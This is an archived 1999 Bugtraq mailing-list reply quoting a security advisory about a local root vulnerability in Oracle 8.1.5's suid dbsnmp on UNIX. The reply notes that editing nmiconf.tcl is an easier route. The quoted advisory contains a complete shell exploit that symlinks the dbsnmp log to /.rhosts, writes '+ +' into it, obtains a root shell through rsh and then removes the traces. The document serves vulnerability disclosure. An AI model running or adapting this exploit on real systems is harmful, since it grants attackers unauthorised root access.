There is a much easier way to exploit dbsnmp than this. Simply edit the file $ORACLE_HOME/network/agent/config/nmiconf.tcl, which is executed when dbsnmp starts up. This was discovered months ago and reported on this list by Gilles Parc, gparcat_private Jared Still Certified Oracle DBA and Part Time Perl Evangelist ;-) Regence BlueCross BlueShield of Oregon jkstillat_private - Work - preferred address jkstillat_private - Work jkstillat_private - private On Sat, 13 Nov 1999, Tellier, Brock wrote: > Greetings, > > OVERVIEW > A vulnerability exists in Oracle 8.1.5 for UN*X which may allow any user > to obtain root privileges. > > BACKGROUND > My testing was done with Oracle 8.1.5 on Solaris 2.6 SPARC edition. > This shouldn't make any difference, however, and I would consider any > UNIX Oracle implementation to be exploitable. > > DETAILS > When run without ORACLE_HOME being set, dbsnmp (suid root/sgid dba by > default) will dump two log files out into pwd, dbsnmpc and dbsnmpt . If > these files do not exist, dbsnmpd will attempt to create them mode 666 > and dump around 400 bytes of uncontrolable output into them. If the > files do exist, dbsnmp will append these 400 bytes but not change the > permissions. Thus if root does not have an .rhosts file, we can obtain > root privs by creating a symlink from /tmp/dbsnmpc to /.rhosts. One > thing to note about the exploit is that on my particular implementation, > a normal user does not have read access above /product/ in the Oracle > path (something like /u01/app/oracle/product/8.1.5/bin/dbsnmp). This > won't prevent you from running the exploit since the execute bit is set > for world on all of Oracle's directories, but you may have to guess > about the location of dbsnmp. This can usually done by examining the > process list for Oracle entries. > > EDITORIAL > One small rant about Oracle is their ridiculously complicated bug > reporting scheme, which asks you 2814 questions and allows you ONE line > of text to explain your problem. In this day and age, I don't > understand why every major software vendor doesn't have something as > simple as a mailto securityat_private SOMEWHERE on their site. In > fact, when I searched Oracle's web page, I got zero hits on the word > "security". Perhaps this address does exist and a bugtraq reader would > care to enlighten me. > > EXPLOIT > > oracle8% uname -a; id > SunOS oracle8 5.6 Generic_105181-05 sun4u sparc > SUNW,Ultra-5_10 > uid=102(btellier) gid=10(staff) > oracle8% /tmp/oracle.sh > couldn't read file "/config/nmiconf.tcl": no such file or directory > Failed to initialize nl component,error=462 > Failed to initialize nl component,error=462 > # > --- oracle.sh --- > #!/bin/sh > # Exploit for Oracle 8.1.5 on Solaris 2.6 and probably others > # You'll probably have to change your path to dbsnmp > # Exploit will only work if /.rhosts does NOT exist > # > # Brock Tellier btellierat_private > cd /tmp > unset ORACLE_HOME > umask 0000 > ln -s /.rhosts /tmp/dbsnmpc.log > /u01/app/oracle/product/8.1.5/bin/dbsnmp > echo "+ +" > /.rhosts > rsh -l root localhost 'sh -i' > rsh -l root localhost rm /tmp/*log* > rsh -l root localhost rm /.rhosts > ------ >
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:12:50 PDT